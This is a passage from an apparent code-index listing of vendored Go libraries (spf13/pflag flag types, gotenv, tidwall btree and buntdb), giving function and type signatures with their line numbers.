GetIntSlice(name string) ([]int, error) { method IntSliceVar (line 114) | func (f *FlagSet) IntSliceVar(p *[]int, name string, value []int, usage ... method IntSliceVarP (line 119) | func (f *FlagSet) IntSliceVarP(p *[]int, name, shorthand string, value [... function IntSliceVar (line 125) | func IntSliceVar(p *[]int, name string, value []int, usage string) { function IntSliceVarP (line 130) | func IntSliceVarP(p *[]int, name, shorthand string, value []int, usage s... method IntSlice (line 136) | func (f *FlagSet) IntSlice(name string, value []int, usage string) *[]int { method IntSliceP (line 143) | func (f *FlagSet) IntSliceP(name, shorthand string, value []int, usage s... function IntSlice (line 151) | func IntSlice(name string, value []int, usage string) *[]int { function IntSliceP (line 156) | func IntSliceP(name, shorthand string, value []int, usage string) *[]int { FILE: vendor/github.com/spf13/pflag/ip.go type ipValue (line 10) | type ipValue method String (line 17) | func (i *ipValue) String() string { return net.IP(*i).String() } method Set (line 18) | func (i *ipValue) Set(s string) error { method Type (line 27) | func (i *ipValue) Type() string { function newIPValue (line 12) | func newIPValue(val net.IP, p *net.IP) *ipValue { function ipConv (line 31) | func ipConv(sval string) (interface{}, error) { method GetIP (line 40) | func (f *FlagSet) GetIP(name string) (net.IP, error) { method IPVar (line 50) | func (f *FlagSet) IPVar(p *net.IP, name string, value net.IP, usage stri... method IPVarP (line 55) | func (f *FlagSet) IPVarP(p *net.IP, name, shorthand string, value net.IP... function IPVar (line 61) | func IPVar(p *net.IP, name string, value net.IP, usage string) { function IPVarP (line 66) | func IPVarP(p *net.IP, name, shorthand string, value net.IP, usage strin... method IP (line 72) | func (f *FlagSet) IP(name string, value net.IP, usage string) *net.IP { method IPP (line 79) | func (f *FlagSet) IPP(name, shorthand string, value net.IP, usage string... function IP (line 87) | func IP(name string, value net.IP, usage string) *net.IP { function IPP (line 92) | func IPP(name, shorthand string, value net.IP, usage string) *net.IP { FILE: vendor/github.com/spf13/pflag/ip_slice.go type ipSliceValue (line 11) | type ipSliceValue struct method Set (line 25) | func (s *ipSliceValue) Set(val string) error { method Type (line 58) | func (s *ipSliceValue) Type() string { method String (line 63) | func (s *ipSliceValue) String() string { method fromString (line 75) | func (s *ipSliceValue) fromString(val string) (net.IP, error) { method toString (line 79) | func (s *ipSliceValue) toString(val net.IP) string { method Append (line 83) | func (s *ipSliceValue) Append(val string) error { method Replace (line 92) | func (s *ipSliceValue) Replace(val []string) error { method GetSlice (line 105) | func (s *ipSliceValue) GetSlice() []string { function newIPSliceValue (line 16) | func newIPSliceValue(val []net.IP, p *[]net.IP) *ipSliceValue { function ipSliceConv (line 113) | func ipSliceConv(val string) (interface{}, error) { method GetIPSlice (line 132) | func (f *FlagSet) GetIPSlice(name string) ([]net.IP, error) { method IPSliceVar (line 142) | func (f *FlagSet) IPSliceVar(p *[]net.IP, name string, value []net.IP, u... method IPSliceVarP (line 147) | func (f *FlagSet) IPSliceVarP(p *[]net.IP, name, shorthand string, value... function IPSliceVar (line 153) | func IPSliceVar(p *[]net.IP, name string, value []net.IP, usage string) { function IPSliceVarP (line 158) | func IPSliceVarP(p *[]net.IP, name, shorthand string, value []net.IP, us... method IPSlice (line 164) | func (f *FlagSet) IPSlice(name string, value []net.IP, usage string) *[]... method IPSliceP (line 171) | func (f *FlagSet) IPSliceP(name, shorthand string, value []net.IP, usage... function IPSlice (line 179) | func IPSlice(name string, value []net.IP, usage string) *[]net.IP { function IPSliceP (line 184) | func IPSliceP(name, shorthand string, value []net.IP, usage string) *[]n... FILE: vendor/github.com/spf13/pflag/ipmask.go type ipMaskValue (line 10) | type ipMaskValue method String (line 17) | func (i *ipMaskValue) String() string { return net.IPMask(*i).String() } method Set (line 18) | func (i *ipMaskValue) Set(s string) error { method Type (line 27) | func (i *ipMaskValue) Type() string { function newIPMaskValue (line 12) | func newIPMaskValue(val net.IPMask, p *net.IPMask) *ipMaskValue { function ParseIPv4Mask (line 33) | func ParseIPv4Mask(s string) net.IPMask { function parseIPv4Mask (line 59) | func parseIPv4Mask(sval string) (interface{}, error) { method GetIPv4Mask (line 68) | func (f *FlagSet) GetIPv4Mask(name string) (net.IPMask, error) { method IPMaskVar (line 78) | func (f *FlagSet) IPMaskVar(p *net.IPMask, name string, value net.IPMask... method IPMaskVarP (line 83) | func (f *FlagSet) IPMaskVarP(p *net.IPMask, name, shorthand string, valu... function IPMaskVar (line 89) | func IPMaskVar(p *net.IPMask, name string, value net.IPMask, usage strin... function IPMaskVarP (line 94) | func IPMaskVarP(p *net.IPMask, name, shorthand string, value net.IPMask,... method IPMask (line 100) | func (f *FlagSet) IPMask(name string, value net.IPMask, usage string) *n... method IPMaskP (line 107) | func (f *FlagSet) IPMaskP(name, shorthand string, value net.IPMask, usag... function IPMask (line 115) | func IPMask(name string, value net.IPMask, usage string) *net.IPMask { function IPMaskP (line 120) | func IPMaskP(name, shorthand string, value net.IPMask, usage string) *ne... FILE: vendor/github.com/spf13/pflag/ipnet.go type ipNetValue (line 10) | type ipNetValue method String (line 12) | func (ipnet ipNetValue) String() string { method Set (line 17) | func (ipnet *ipNetValue) Set(value string) error { method Type (line 26) | func (*ipNetValue) Type() string { function newIPNetValue (line 30) | func newIPNetValue(val net.IPNet, p *net.IPNet) *ipNetValue { function ipNetConv (line 35) | func ipNetConv(sval string) (interface{}, error) { method GetIPNet (line 44) | func (f *FlagSet) GetIPNet(name string) (net.IPNet, error) { method IPNetVar (line 54) | func (f *FlagSet) IPNetVar(p *net.IPNet, name string, value net.IPNet, u... method IPNetVarP (line 59) | func (f *FlagSet) IPNetVarP(p *net.IPNet, name, shorthand string, value ... function IPNetVar (line 65) | func IPNetVar(p *net.IPNet, name string, value net.IPNet, usage string) { function IPNetVarP (line 70) | func IPNetVarP(p *net.IPNet, name, shorthand string, value net.IPNet, us... method IPNet (line 76) | func (f *FlagSet) IPNet(name string, value net.IPNet, usage string) *net... method IPNetP (line 83) | func (f *FlagSet) IPNetP(name, shorthand string, value net.IPNet, usage ... function IPNet (line 91) | func IPNet(name string, value net.IPNet, usage string) *net.IPNet { function IPNetP (line 96) | func IPNetP(name, shorthand string, value net.IPNet, usage string) *net.... FILE: vendor/github.com/spf13/pflag/string.go type stringValue (line 4) | type stringValue method Set (line 11) | func (s *stringValue) Set(val string) error { method Type (line 15) | func (s *stringValue) Type() string { method String (line 19) | func (s *stringValue) String() string { return string(*s) } function newStringValue (line 6) | func newStringValue(val string, p *string) *stringValue { function stringConv (line 21) | func stringConv(sval string) (interface{}, error) { method GetString (line 26) | func (f *FlagSet) GetString(name string) (string, error) { method StringVar (line 36) | func (f *FlagSet) StringVar(p *string, name string, value string, usage ... method StringVarP (line 41) | func (f *FlagSet) StringVarP(p *string, name, shorthand string, value st... function StringVar (line 47) | func StringVar(p *string, name string, value string, usage string) { function StringVarP (line 52) | func StringVarP(p *string, name, shorthand string, value string, usage s... method String (line 58) | func (f *FlagSet) String(name string, value string, usage string) *string { method StringP (line 65) | func (f *FlagSet) StringP(name, shorthand string, value string, usage st... function String (line 73) | func String(name string, value string, usage string) *string { function StringP (line 78) | func StringP(name, shorthand string, value string, usage string) *string { FILE: vendor/github.com/spf13/pflag/string_array.go type stringArrayValue (line 4) | type stringArrayValue struct method Set (line 16) | func (s *stringArrayValue) Set(val string) error { method Append (line 26) | func (s *stringArrayValue) Append(val string) error { method Replace (line 31) | func (s *stringArrayValue) Replace(val []string) error { method GetSlice (line 44) | func (s *stringArrayValue) GetSlice() []string { method Type (line 52) | func (s *stringArrayValue) Type() string { method String (line 56) | func (s *stringArrayValue) String() string { function newStringArrayValue (line 9) | func newStringArrayValue(val []string, p *[]string) *stringArrayValue { function stringArrayConv (line 61) | func stringArrayConv(sval string) (interface{}, error) { method GetStringArray (line 71) | func (f *FlagSet) GetStringArray(name string) ([]string, error) { method StringArrayVar (line 82) | func (f *FlagSet) StringArrayVar(p *[]string, name string, value []strin... method StringArrayVarP (line 87) | func (f *FlagSet) StringArrayVarP(p *[]string, name, shorthand string, v... function StringArrayVar (line 94) | func StringArrayVar(p *[]string, name string, value []string, usage stri... function StringArrayVarP (line 99) | func StringArrayVarP(p *[]string, name, shorthand string, value []string... method StringArray (line 106) | func (f *FlagSet) StringArray(name string, value []string, usage string)... method StringArrayP (line 113) | func (f *FlagSet) StringArrayP(name, shorthand string, value []string, u... function StringArray (line 122) | func StringArray(name string, value []string, usage string) *[]string { function StringArrayP (line 127) | func StringArrayP(name, shorthand string, value []string, usage string) ... FILE: vendor/github.com/spf13/pflag/string_slice.go type stringSliceValue (line 10) | type stringSliceValue struct method Set (line 42) | func (s *stringSliceValue) Set(val string) error { method Type (line 56) | func (s *stringSliceValue) Type() string { method String (line 60) | func (s *stringSliceValue) String() string { method Append (line 65) | func (s *stringSliceValue) Append(val string) error { method Replace (line 70) | func (s *stringSliceValue) Replace(val []string) error { method GetSlice (line 75) | func (s *stringSliceValue) GetSlice() []string { function newStringSliceValue (line 15) | func newStringSliceValue(val []string, p *[]string) *stringSliceValue { function readAsCSV (line 22) | func readAsCSV(val string) ([]string, error) { function writeAsCSV (line 31) | func writeAsCSV(vals []string) (string, error) { function stringSliceConv (line 79) | func stringSliceConv(sval string) (interface{}, error) { method GetStringSlice (line 89) | func (f *FlagSet) GetStringSlice(name string) ([]string, error) { method StringSliceVar (line 104) | func (f *FlagSet) StringSliceVar(p *[]string, name string, value []strin... method StringSliceVarP (line 109) | func (f *FlagSet) StringSliceVarP(p *[]string, name, shorthand string, v... function StringSliceVar (line 120) | func StringSliceVar(p *[]string, name string, value []string, usage stri... function StringSliceVarP (line 125) | func StringSliceVarP(p *[]string, name, shorthand string, value []string... method StringSlice (line 136) | func (f *FlagSet) StringSlice(name string, value []string, usage string)... method StringSliceP (line 143) | func (f *FlagSet) StringSliceP(name, shorthand string, value []string, u... function StringSlice (line 156) | func StringSlice(name string, value []string, usage string) *[]string { function StringSliceP (line 161) | func StringSliceP(name, shorthand string, value []string, usage string) ... FILE: vendor/github.com/spf13/pflag/string_to_int.go type stringToIntValue (line 11) | type stringToIntValue struct method Set (line 24) | func (s *stringToIntValue) Set(val string) error { method Type (line 49) | func (s *stringToIntValue) Type() string { method String (line 53) | func (s *stringToIntValue) String() string { function newStringToIntValue (line 16) | func newStringToIntValue(val map[string]int, p *map[string]int) *stringT... function stringToIntConv (line 68) | func stringToIntConv(val string) (interface{}, error) { method GetStringToInt (line 91) | func (f *FlagSet) GetStringToInt(name string) (map[string]int, error) { method StringToIntVar (line 102) | func (f *FlagSet) StringToIntVar(p *map[string]int, name string, value m... method StringToIntVarP (line 107) | func (f *FlagSet) StringToIntVarP(p *map[string]int, name, shorthand str... function StringToIntVar (line 114) | func StringToIntVar(p *map[string]int, name string, value map[string]int... function StringToIntVarP (line 119) | func StringToIntVarP(p *map[string]int, name, shorthand string, value ma... method StringToInt (line 126) | func (f *FlagSet) StringToInt(name string, value map[string]int, usage s... method StringToIntP (line 133) | func (f *FlagSet) StringToIntP(name, shorthand string, value map[string]... function StringToInt (line 142) | func StringToInt(name string, value map[string]int, usage string) *map[s... function StringToIntP (line 147) | func StringToIntP(name, shorthand string, value map[string]int, usage st... FILE: vendor/github.com/spf13/pflag/string_to_int64.go type stringToInt64Value (line 11) | type stringToInt64Value struct method Set (line 24) | func (s *stringToInt64Value) Set(val string) error { method Type (line 49) | func (s *stringToInt64Value) Type() string { method String (line 53) | func (s *stringToInt64Value) String() string { function newStringToInt64Value (line 16) | func newStringToInt64Value(val map[string]int64, p *map[string]int64) *s... function stringToInt64Conv (line 68) | func stringToInt64Conv(val string) (interface{}, error) { method GetStringToInt64 (line 91) | func (f *FlagSet) GetStringToInt64(name string) (map[string]int64, error) { method StringToInt64Var (line 102) | func (f *FlagSet) StringToInt64Var(p *map[string]int64, name string, val... method StringToInt64VarP (line 107) | func (f *FlagSet) StringToInt64VarP(p *map[string]int64, name, shorthand... function StringToInt64Var (line 114) | func StringToInt64Var(p *map[string]int64, name string, value map[string... function StringToInt64VarP (line 119) | func StringToInt64VarP(p *map[string]int64, name, shorthand string, valu... method StringToInt64 (line 126) | func (f *FlagSet) StringToInt64(name string, value map[string]int64, usa... method StringToInt64P (line 133) | func (f *FlagSet) StringToInt64P(name, shorthand string, value map[strin... function StringToInt64 (line 142) | func StringToInt64(name string, value map[string]int64, usage string) *m... function StringToInt64P (line 147) | func StringToInt64P(name, shorthand string, value map[string]int64, usag... FILE: vendor/github.com/spf13/pflag/string_to_string.go type stringToStringValue (line 11) | type stringToStringValue struct method Set (line 24) | func (s *stringToStringValue) Set(val string) error { method Type (line 60) | func (s *stringToStringValue) Type() string { method String (line 64) | func (s *stringToStringValue) String() string { function newStringToStringValue (line 16) | func newStringToStringValue(val map[string]string, p *map[string]string)... function stringToStringConv (line 79) | func stringToStringConv(val string) (interface{}, error) { method GetStringToString (line 102) | func (f *FlagSet) GetStringToString(name string) (map[string]string, err... method StringToStringVar (line 113) | func (f *FlagSet) StringToStringVar(p *map[string]string, name string, v... method StringToStringVarP (line 118) | func (f *FlagSet) StringToStringVarP(p *map[string]string, name, shortha... function StringToStringVar (line 125) | func StringToStringVar(p *map[string]string, name string, value map[stri... function StringToStringVarP (line 130) | func StringToStringVarP(p *map[string]string, name, shorthand string, va... method StringToString (line 137) | func (f *FlagSet) StringToString(name string, value map[string]string, u... method StringToStringP (line 144) | func (f *FlagSet) StringToStringP(name, shorthand string, value map[stri... function StringToString (line 153) | func StringToString(name string, value map[string]string, usage string) ... function StringToStringP (line 158) | func StringToStringP(name, shorthand string, value map[string]string, us... FILE: vendor/github.com/spf13/pflag/uint.go type uintValue (line 6) | type uintValue method Set (line 13) | func (i *uintValue) Set(s string) error { method Type (line 19) | func (i *uintValue) Type() string { method String (line 23) | func (i *uintValue) String() string { return strconv.FormatUint(uint64... function newUintValue (line 8) | func newUintValue(val uint, p *uint) *uintValue { function uintConv (line 25) | func uintConv(sval string) (interface{}, error) { method GetUint (line 34) | func (f *FlagSet) GetUint(name string) (uint, error) { method UintVar (line 44) | func (f *FlagSet) UintVar(p *uint, name string, value uint, usage string) { method UintVarP (line 49) | func (f *FlagSet) UintVarP(p *uint, name, shorthand string, value uint, ... function UintVar (line 55) | func UintVar(p *uint, name string, value uint, usage string) { function UintVarP (line 60) | func UintVarP(p *uint, name, shorthand string, value uint, usage string) { method Uint (line 66) | func (f *FlagSet) Uint(name string, value uint, usage string) *uint { method UintP (line 73) | func (f *FlagSet) UintP(name, shorthand string, value uint, usage string... function Uint (line 81) | func Uint(name string, value uint, usage string) *uint { function UintP (line 86) | func UintP(name, shorthand string, value uint, usage string) *uint { FILE: vendor/github.com/spf13/pflag/uint16.go type uint16Value (line 6) | type uint16Value method Set (line 13) | func (i *uint16Value) Set(s string) error { method Type (line 19) | func (i *uint16Value) Type() string { method String (line 23) | func (i *uint16Value) String() string { return strconv.FormatUint(uint... function newUint16Value (line 8) | func newUint16Value(val uint16, p *uint16) *uint16Value { function uint16Conv (line 25) | func uint16Conv(sval string) (interface{}, error) { method GetUint16 (line 34) | func (f *FlagSet) GetUint16(name string) (uint16, error) { method Uint16Var (line 44) | func (f *FlagSet) Uint16Var(p *uint16, name string, value uint16, usage ... method Uint16VarP (line 49) | func (f *FlagSet) Uint16VarP(p *uint16, name, shorthand string, value ui... function Uint16Var (line 55) | func Uint16Var(p *uint16, name string, value uint16, usage string) { function Uint16VarP (line 60) | func Uint16VarP(p *uint16, name, shorthand string, value uint16, usage s... method Uint16 (line 66) | func (f *FlagSet) Uint16(name string, value uint16, usage string) *uint16 { method Uint16P (line 73) | func (f *FlagSet) Uint16P(name, shorthand string, value uint16, usage st... function Uint16 (line 81) | func Uint16(name string, value uint16, usage string) *uint16 { function Uint16P (line 86) | func Uint16P(name, shorthand string, value uint16, usage string) *uint16 { FILE: vendor/github.com/spf13/pflag/uint32.go type uint32Value (line 6) | type uint32Value method Set (line 13) | func (i *uint32Value) Set(s string) error { method Type (line 19) | func (i *uint32Value) Type() string { method String (line 23) | func (i *uint32Value) String() string { return strconv.FormatUint(uint... function newUint32Value (line 8) | func newUint32Value(val uint32, p *uint32) *uint32Value { function uint32Conv (line 25) | func uint32Conv(sval string) (interface{}, error) { method GetUint32 (line 34) | func (f *FlagSet) GetUint32(name string) (uint32, error) { method Uint32Var (line 44) | func (f *FlagSet) Uint32Var(p *uint32, name string, value uint32, usage ... method Uint32VarP (line 49) | func (f *FlagSet) Uint32VarP(p *uint32, name, shorthand string, value ui... function Uint32Var (line 55) | func Uint32Var(p *uint32, name string, value uint32, usage string) { function Uint32VarP (line 60) | func Uint32VarP(p *uint32, name, shorthand string, value uint32, usage s... method Uint32 (line 66) | func (f *FlagSet) Uint32(name string, value uint32, usage string) *uint32 { method Uint32P (line 73) | func (f *FlagSet) Uint32P(name, shorthand string, value uint32, usage st... function Uint32 (line 81) | func Uint32(name string, value uint32, usage string) *uint32 { function Uint32P (line 86) | func Uint32P(name, shorthand string, value uint32, usage string) *uint32 { FILE: vendor/github.com/spf13/pflag/uint64.go type uint64Value (line 6) | type uint64Value method Set (line 13) | func (i *uint64Value) Set(s string) error { method Type (line 19) | func (i *uint64Value) Type() string { method String (line 23) | func (i *uint64Value) String() string { return strconv.FormatUint(uint... function newUint64Value (line 8) | func newUint64Value(val uint64, p *uint64) *uint64Value { function uint64Conv (line 25) | func uint64Conv(sval string) (interface{}, error) { method GetUint64 (line 34) | func (f *FlagSet) GetUint64(name string) (uint64, error) { method Uint64Var (line 44) | func (f *FlagSet) Uint64Var(p *uint64, name string, value uint64, usage ... method Uint64VarP (line 49) | func (f *FlagSet) Uint64VarP(p *uint64, name, shorthand string, value ui... function Uint64Var (line 55) | func Uint64Var(p *uint64, name string, value uint64, usage string) { function Uint64VarP (line 60) | func Uint64VarP(p *uint64, name, shorthand string, value uint64, usage s... method Uint64 (line 66) | func (f *FlagSet) Uint64(name string, value uint64, usage string) *uint64 { method Uint64P (line 73) | func (f *FlagSet) Uint64P(name, shorthand string, value uint64, usage st... function Uint64 (line 81) | func Uint64(name string, value uint64, usage string) *uint64 { function Uint64P (line 86) | func Uint64P(name, shorthand string, value uint64, usage string) *uint64 { FILE: vendor/github.com/spf13/pflag/uint8.go type uint8Value (line 6) | type uint8Value method Set (line 13) | func (i *uint8Value) Set(s string) error { method Type (line 19) | func (i *uint8Value) Type() string { method String (line 23) | func (i *uint8Value) String() string { return strconv.FormatUint(uint6... function newUint8Value (line 8) | func newUint8Value(val uint8, p *uint8) *uint8Value { function uint8Conv (line 25) | func uint8Conv(sval string) (interface{}, error) { method GetUint8 (line 34) | func (f *FlagSet) GetUint8(name string) (uint8, error) { method Uint8Var (line 44) | func (f *FlagSet) Uint8Var(p *uint8, name string, value uint8, usage str... method Uint8VarP (line 49) | func (f *FlagSet) Uint8VarP(p *uint8, name, shorthand string, value uint... function Uint8Var (line 55) | func Uint8Var(p *uint8, name string, value uint8, usage string) { function Uint8VarP (line 60) | func Uint8VarP(p *uint8, name, shorthand string, value uint8, usage stri... method Uint8 (line 66) | func (f *FlagSet) Uint8(name string, value uint8, usage string) *uint8 { method Uint8P (line 73) | func (f *FlagSet) Uint8P(name, shorthand string, value uint8, usage stri... function Uint8 (line 81) | func Uint8(name string, value uint8, usage string) *uint8 { function Uint8P (line 86) | func Uint8P(name, shorthand string, value uint8, usage string) *uint8 { FILE: vendor/github.com/spf13/pflag/uint_slice.go type uintSliceValue (line 10) | type uintSliceValue struct method Set (line 22) | func (s *uintSliceValue) Set(val string) error { method Type (line 41) | func (s *uintSliceValue) Type() string { method String (line 45) | func (s *uintSliceValue) String() string { method fromString (line 53) | func (s *uintSliceValue) fromString(val string) (uint, error) { method toString (line 61) | func (s *uintSliceValue) toString(val uint) string { method Append (line 65) | func (s *uintSliceValue) Append(val string) error { method Replace (line 74) | func (s *uintSliceValue) Replace(val []string) error { method GetSlice (line 87) | func (s *uintSliceValue) GetSlice() []string { function newUintSliceValue (line 15) | func newUintSliceValue(val []uint, p *[]uint) *uintSliceValue { function uintSliceConv (line 95) | func uintSliceConv(val string) (interface{}, error) { method GetUintSlice (line 114) | func (f *FlagSet) GetUintSlice(name string) ([]uint, error) { method UintSliceVar (line 124) | func (f *FlagSet) UintSliceVar(p *[]uint, name string, value []uint, usa... method UintSliceVarP (line 129) | func (f *FlagSet) UintSliceVarP(p *[]uint, name, shorthand string, value... function UintSliceVar (line 135) | func UintSliceVar(p *[]uint, name string, value []uint, usage string) { function UintSliceVarP (line 140) | func UintSliceVarP(p *[]uint, name, shorthand string, value []uint, usag... method UintSlice (line 146) | func (f *FlagSet) UintSlice(name string, value []uint, usage string) *[]... method UintSliceP (line 153) | func (f *FlagSet) UintSliceP(name, shorthand string, value []uint, usage... function UintSlice (line 161) | func UintSlice(name string, value []uint, usage string) *[]uint { function UintSliceP (line 166) | func UintSliceP(name, shorthand string, value []uint, usage string) *[]u... FILE: vendor/github.com/subosito/gotenv/gotenv.go constant linePattern (line 15) | linePattern = `\A\s*(?:export\s+)?([\w\.]+)(?:\s*=\s*|:\s+?)('(?:\'|[^']... constant variablePattern (line 18) | variablePattern = `(\\)?(\$)(\{?([A-Z0-9_]+)?\}?)` type Env (line 22) | type Env function Load (line 29) | func Load(filenames ...string) error { function OverLoad (line 36) | func OverLoad(filenames ...string) error { function Must (line 43) | func Must(fn func(filenames ...string) error, filenames ...string) { function Apply (line 52) | func Apply(r io.Reader) error { function OverApply (line 59) | func OverApply(r io.Reader) error { function loadenv (line 63) | func loadenv(override bool, filenames ...string) error { function parset (line 86) | func parset(r io.Reader, override bool) error { function setenv (line 99) | func setenv(key, val string, override bool) { function Parse (line 112) | func Parse(r io.Reader) Env { function StrictParse (line 120) | func StrictParse(r io.Reader) (Env, error) { function parseLine (line 145) | func parseLine(s string, env Env) error { function parseExport (line 190) | func parseExport(st string, env Env) error { function varReplacement (line 204) | func varReplacement(s string, hsq bool, env Env) string { function checkFormat (line 231) | func checkFormat(s string, env Env) error { function parseVal (line 245) | func parseVal(val string, env Env) string { FILE: vendor/github.com/tidwall/btree/btree.go type Item (line 58) | type Item interface constant DefaultFreeListSize (line 71) | DefaultFreeListSize = 32 type FreeList (line 83) | type FreeList struct method newNode (line 94) | func (f *FreeList) newNode() (n *node) { method freeNode (line 108) | func (f *FreeList) freeNode(n *node) { function NewFreeList (line 90) | func NewFreeList(size int) *FreeList { type ItemIterator (line 119) | type ItemIterator function New (line 125) | func New(degree int, ctx interface{}) *BTree { function NewWithFreeList (line 130) | func NewWithFreeList(degree int, f *FreeList, ctx interface{}) *BTree { type items (line 142) | type items method insertAt (line 146) | func (s *items) insertAt(index int, item Item) { method removeAt (line 156) | func (s *items) removeAt(index int) Item { method pop (line 165) | func (s *items) pop() (out Item) { method truncate (line 175) | func (s *items) truncate(index int) { method find (line 186) | func (s items) find(item Item, ctx interface{}) (index int, found bool) { type children (line 203) | type children method insertAt (line 207) | func (s *children) insertAt(index int, n *node) { method removeAt (line 217) | func (s *children) removeAt(index int) *node { method pop (line 226) | func (s *children) pop() (out *node) { method truncate (line 236) | func (s *children) truncate(index int) { type node (line 249) | type node struct method mutableFor (line 255) | func (n *node) mutableFor(cow *copyOnWriteContext) *node { method mutableChild (line 276) | func (n *node) mutableChild(i int) *node { method split (line 285) | func (n *node) split(i int) (Item, *node) { method maybeSplitChild (line 299) | func (n *node) maybeSplitChild(i, maxItems int) bool { method insert (line 313) | func (n *node) insert(item Item, maxItems int, ctx interface{}) Item { method get (line 341) | func (n *node) get(key Item, ctx interface{}) Item { method remove (line 389) | func (n *node) remove(item Item, minItems int, typ toRemove, ctx inter... method growChildAndRemove (line 456) | func (n *node) growChildAndRemove(i int, item Item, minItems int, typ ... method iterate (line 507) | func (n *node) iterate(dir direction, start, stop Item, includeStart b... method print (line 567) | func (n *node) print(w io.Writer, level int) { function min (line 352) | func min(n *node) Item { function max (line 366) | func max(n *node) Item { type toRemove (line 380) | type toRemove constant removeItem (line 383) | removeItem toRemove = iota constant removeMin (line 384) | removeMin constant removeMax (line 385) | removeMax type direction (line 493) | type direction constant descend (line 496) | descend = direction(-1) constant ascend (line 497) | ascend = direction(+1) type BTree (line 581) | type BTree struct method Clone (line 618) | func (t *BTree) Clone() (t2 *BTree) { method maxItems (line 632) | func (t *BTree) maxItems() int { method minItems (line 638) | func (t *BTree) minItems() int { method ReplaceOrInsert (line 663) | func (t *BTree) ReplaceOrInsert(item Item) Item { method Delete (line 691) | func (t *BTree) Delete(item Item) Item { method DeleteMin (line 697) | func (t *BTree) DeleteMin() Item { method DeleteMax (line 703) | func (t *BTree) DeleteMax() Item { method deleteItem (line 707) | func (t *BTree) deleteItem(item Item, typ toRemove, ctx interface{}) I... method AscendRange (line 726) | func (t *BTree) AscendRange(greaterOrEqual, lessThan Item, iterator It... method AscendLessThan (line 735) | func (t *BTree) AscendLessThan(pivot Item, iterator ItemIterator) { method AscendGreaterOrEqual (line 744) | func (t *BTree) AscendGreaterOrEqual(pivot Item, iterator ItemIterator) { method Ascend (line 753) | func (t *BTree) Ascend(iterator ItemIterator) { method DescendRange (line 762) | func (t *BTree) DescendRange(lessOrEqual, greaterThan Item, iterator I... method DescendLessOrEqual (line 771) | func (t *BTree) DescendLessOrEqual(pivot Item, iterator ItemIterator) { method DescendGreaterThan (line 780) | func (t *BTree) DescendGreaterThan(pivot Item, iterator ItemIterator) { method Descend (line 789) | func (t *BTree) Descend(iterator ItemIterator) { method Get (line 798) | func (t *BTree) Get(key Item) Item { method Min (line 806) | func (t *BTree) Min() Item { method Max (line 811) | func (t *BTree) Max() Item { method Has (line 816) | func (t *BTree) Has(key Item) bool { method Len (line 821) | func (t *BTree) Len() int { method Cursor (line 849) | func (t *BTree) Cursor() *Cursor { type copyOnWriteContext (line 603) | type copyOnWriteContext struct method newNode (line 642) | func (c *copyOnWriteContext) newNode() (n *node) { method freeNode (line 648) | func (c *copyOnWriteContext) freeNode(n *node) { type Int (line 826) | type Int method Less (line 829) | func (a Int) Less(b Item, ctx interface{}) bool { type stackItem (line 833) | type stackItem struct type Cursor (line 843) | type Cursor struct method First (line 854) | func (c *Cursor) First() Item { method Next (line 872) | func (c *Cursor) Next() Item { method Last (line 899) | func (c *Cursor) Last() Item { method Prev (line 917) | func (c *Cursor) Prev() Item { method Seek (line 942) | func (c *Cursor) Seek(pivot Item) Item { FILE: vendor/github.com/tidwall/buntdb/buntdb.go type DB (line 65) | type DB struct method Close (line 177) | func (db *DB) Close() error { method Save (line 200) | func (db *DB) Save(wr io.Writer) error { method Load (line 236) | func (db *DB) Load(rd io.Reader) error { method CreateIndex (line 339) | func (db *DB) CreateIndex(name, pattern string, method ReplaceIndex (line 352) | func (db *DB) ReplaceIndex(name, pattern string, method CreateSpatialIndex (line 386) | func (db *DB) CreateSpatialIndex(name, pattern string, method ReplaceSpatialIndex (line 399) | func (db *DB) ReplaceSpatialIndex(name, pattern string, method DropIndex (line 420) | func (db *DB) DropIndex(name string) error { method Indexes (line 429) | func (db *DB) Indexes() ([]string, error) { method ReadConfig (line 440) | func (db *DB) ReadConfig(config *Config) error { method SetConfig (line 451) | func (db *DB) SetConfig(config Config) error { method insertIntoDatabase (line 469) | func (db *DB) insertIntoDatabase(item *dbItem) *dbItem { method deleteFromDatabase (line 519) | func (db *DB) deleteFromDatabase(item *dbItem) *dbItem { method backgroundManager (line 544) | func (db *DB) backgroundManager() { method Shrink (line 633) | func (db *DB) Shrink() error { method readLoad (line 774) | func (db *DB) readLoad(rd io.Reader, modTime time.Time) error { method load (line 919) | func (db *DB) load() error { method managed (line 937) | func (db *DB) managed(writable bool, fn func(tx *Tx) error) (err error) { method View (line 971) | func (db *DB) View(fn func(tx *Tx) error) error { method Update (line 983) | func (db *DB) Update(fn func(tx *Tx) error) error { method get (line 988) | func (db *DB) get(key string) *dbItem { method Begin (line 1062) | func (db *DB) Begin(writable bool) (*Tx, error) { type SyncPolicy (line 82) | type SyncPolicy constant Never (line 87) | Never SyncPolicy = 0 constant EverySecond (line 92) | EverySecond = 1 constant Always (line 95) | Always = 2 type Config (line 100) | type Config struct type exctx (line 133) | type exctx struct constant btreeDegrees (line 138) | btreeDegrees = 64 function Open (line 142) | func Open(path string) (*DB, error) { type index (line 248) | type index struct method match (line 260) | func (idx *index) match(key string) bool { method clearCopy (line 276) | func (idx *index) clearCopy() *index { method rebuild (line 297) | func (idx *index) rebuild() { type Tx (line 1002) | type Tx struct method DeleteAll (line 1022) | func (tx *Tx) DeleteAll() error { method lock (line 1086) | func (tx *Tx) lock() { method unlock (line 1095) | func (tx *Tx) unlock() { method rollbackInner (line 1105) | func (tx *Tx) rollbackInner() { method Commit (line 1135) | func (tx *Tx) Commit() error { method Rollback (line 1182) | func (tx *Tx) Rollback() error { method GetLess (line 1334) | func (tx *Tx) GetLess(index string) (func(a, b string) bool, error) { method GetRect (line 1349) | func (tx *Tx) GetRect(index string) (func(s string) (min, max []float64), method Set (line 1372) | func (tx *Tx) Set(key, value string, opts *SetOptions) (previousValue ... method Get (line 1424) | func (tx *Tx) Get(key string, ignoreExpired ...bool) (val string, err ... method Delete (line 1446) | func (tx *Tx) Delete(key string) (val string, err error) { method TTL (line 1480) | func (tx *Tx) TTL(key string) (time.Duration, error) { method scan (line 1507) | func (tx *Tx) scan(desc, gt, lt bool, index, start, stop string, method AscendKeys (line 1590) | func (tx *Tx) AscendKeys(pattern string, method DescendKeys (line 1623) | func (tx *Tx) DescendKeys(pattern string, method Ascend (line 1661) | func (tx *Tx) Ascend(index string, method AscendGreaterOrEqual (line 1672) | func (tx *Tx) AscendGreaterOrEqual(index, pivot string, method AscendLessThan (line 1683) | func (tx *Tx) AscendLessThan(index, pivot string, method AscendRange (line 1694) | func (tx *Tx) AscendRange(index, greaterOrEqual, lessThan string, method Descend (line 1707) | func (tx 